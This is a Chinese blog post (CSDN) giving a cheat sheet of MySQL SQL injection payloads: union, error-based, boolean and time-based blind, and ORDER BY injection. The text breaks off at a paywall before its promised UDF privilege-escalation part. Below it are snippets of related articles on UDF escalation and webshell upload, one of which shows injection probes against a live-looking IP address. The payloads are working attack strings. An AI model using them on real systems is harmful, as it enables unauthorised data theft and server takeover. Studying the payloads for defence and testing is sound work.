sql注入常见方法及udf提权

最新推荐文章于 2025-03-30 23:26:48 发布
最新推荐文章于 2025-03-30 23:26:48 发布
阅读量3.6k 收藏 10
点赞数 1
分类专栏: 漏洞复现 文章标签: mysql php 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/105468416
版权

sql注入常见方法及udf提权

sql注入总结

1.联合注入

order by 判断字段数或者通过union select 1,2,3.。。。。。来判断字段数和输出位置

获取当前数据库 union select 1,database()-- -

获取数据库中的表 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

获取表中的字段名 union select 1,group_concat(column_name) from information_schema.columns where table_name=’ '-- -

2.报错注入

select count(*),(concat(floor(rand(0)*2),(select version())))x from user group by x;

select * from xxx where id=‘12’ or extractvalue(1,concat(user(),0x7e,version()))

select * from xxx where id=‘12’ or updatexml(1,concat(user(),0x7e,version()),1)

3.盲注

3.1布尔盲注

猜解长度 之后逐个通过ascii猜解通过返回不同的结果来判断

select * from xxx where id=‘12’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109

select ascii(substr(database(),1,1))=100;

3.2时间盲注

猜解长度 之后逐个通过ascii猜解通过返回不同的时间来判断

select * from xxx where id=‘12’ and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1 )) > 120,sleep(2),NULL)

4.order by注入

select * from xxx order by updatexml(1,if(1=1,1,user()),1)

select * from xxx order by IF(1=1,1,(select+1+union+select+2))

select * from xxx order by (select+1+regexp+if(1=1,1,0x00))

select * from xxx order by extractvalue(1,if(1=1,1,user()))

select * from xxx order by if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))

5.limit注入

最低0.47元/天 解锁文章
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF
weixin_54626591的博客
10-23 182
利用MSF对MYSQL进行简单的UDF
SQL注入UDF命令执行
孤桜懶契
08-15 4474
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写 二、udf在渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
【Web渗透】SQL注入
A520013141314的博客
12-30 1592
我们注册一个username为admin[20个空格]asd的用户名,则在mysql中首先会判断是否有重复,若无重复,则会截取前20个字符加入到数据库中,所以数据库存储的数据为admin[20个空格],而进行登录的时候,SQL语句会忽略空格,因此我们相当于覆写了admin账号。为什么要把Linux单独出来说,因为Linux的限控制很严格,有的时候即使我们完全控住了MYSQL 但是,没有对网站根目录的读写限,也会没有办法去利用上述方法写shell。
WEB安全--SQL注入--MySQL
最新发布
m0_74800552的博客
03-30 1019
用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,我就使用UDF加入一些函数进去,那么我就可以在mysql中使用这个函数了。
SQL注入-基于MySQL注入(十七)
Gjqhs的博客
02-22 3797
实验目的 普及结合dll文件对Windows系统进行UDF,掌握UDF的基本思路,熟悉UDF的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 通过某种方式将低限用户升为高限用户的过程。 注入 一般指的是在掌控了某数据库账户的情况下,通过SQL注入等方式升该账户的 限,进而夺得服务器(操作系统)的控制 Windows2003操作系统—一默认用户 System:本地机器上拥有最高限的用户,普通用户管理工具查看不到 Adminis
WEB 安全之 SQL注入 < 三 >
2301_77162959的博客
06-16 562
在文章最后一段管理员做了敏感字符的过滤,管理员过滤掉了空格,而攻击者通过 /**/ 来代替空格绕过了过滤字符。SQL注入是一个比较“古老”的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆。想一想,注册表都能改了,开启远程桌面,查看远程桌面开放的端口....等等等等,不都是手到擒来的事情吗!打开之后就可以执行了,通过它能做的事情太多了,开启你的想象力,在这里我们看看添加用户 ,需要用到 net user 命令,的大致语法是这样的。
SQL注入GET参数注入版)
2303_76679642的博客
04-23 740
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
利用 SQL 注入进行的方式+pdf
12-13
SQL注入是一种常见的网络攻击手段,攻击者通过在输入中插入恶意的SQL语句,破坏原有的SQL查询结构,从而获取未授的数据库访问限。在获取了一定的数据库访问限后,攻击者可能会尝试进行操作,以获取更高的...
linux环境下的MySQL UDF
黑战士的博客
04-25 2287
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞的时候发现补丁全部被修补。这个时候需要利用第三方应用。当MYSQL限比较高的时候我们就可以利用udf。###利用前mysqlfuncfunc。
ctfshow sql注入 udf
01-17
在CTF竞赛中,SQL注入是一种常见的攻击方式。当涉及到用户定义函数(UDFs),这种技术可以被利用来执行更复杂的操作。对于CTFShow平台中的SQL注入UDF相关的挑战,参与者通常会遇到需要通过SQL注入漏洞上传并调用...
3-4SQL注入系统交互
山兔的博客
02-10 2132
我们本篇文章将讲述,SQL注入中如何与系统层进行交互的,假如,我们在前面的章节中,可以确认用户,能够与系统层进行交互,那与系统层交互就变得相当重要 1.与系统层交互的方式 因为一旦能够与系统层交互,那就能够 1.读和写磁盘文件 甚至能够以管理员的限 2.直接执行系统层的命令 这就意味着,系统可能被控制的风险 读和写磁盘文件的方式,因为可能有所限制,但是随着工具的使用,可能最终会得到系统层的限 第二种,可能与系统层的管理员限来运行的程序,直接就可以执行命令,这种方式,也相当于得到了系统层的控制 SQL
sql注入拿服务器
12-06
sql注入拿服务器
mysql注入命令
12-03
mysql注入命令 php类型的网站很多都存在MYSQL注入漏洞,而利用注入来获取限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码
sql手注和udf
m0_53042636的博客
04-12 1098
1、510cms使用手工注入挂下一句话木马。操作步骤配截图。 http://159.75.16.25:88/about.php?listid=6 正常页面 http://159.75.16.25:88/about.php?listid=6‘ 异常页面 http://159.75.16.25:88/about.php?listid=6 and 1=1 – + 正常页面 http://159.75.16.25:88/about.php?listid=6 and 1=2 – + 异常页面 可以判断出为整形注入
MySQL--udf
故事讲予风听
07-09 212
udf = 'user defined function',即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充。如何获得udf文件将文件放到哪才能让mysql承认这个函数函数功能为什么这东西能(自定义函数指令是直接以管理员的限运行的SQL 注入且是高限secure_file_priv 无限制plugin 目录可写。
mysql sql注入
u012684933的专栏
05-23 3539
可以通过上传一句话木马的方式实现sql注入
MySQLUDF
2301_76227305的博客
06-08 2748
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
mysql udf
weixin_60719780的博客
03-16 1602
udf只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们需要使用这个16进制的udf.dll文件;
WEB 安全之 SQL注入 < 三 >
06-19 218
前两篇文章介绍了攻击者通过构造SQL语句来获得“非授信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。     测试环境跟上一篇相同, MSQL + asp.net + win7。前面已经拿下了管理员用户名、密码,我们还是使用新闻详细页面 ( 方便测试,不设防 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值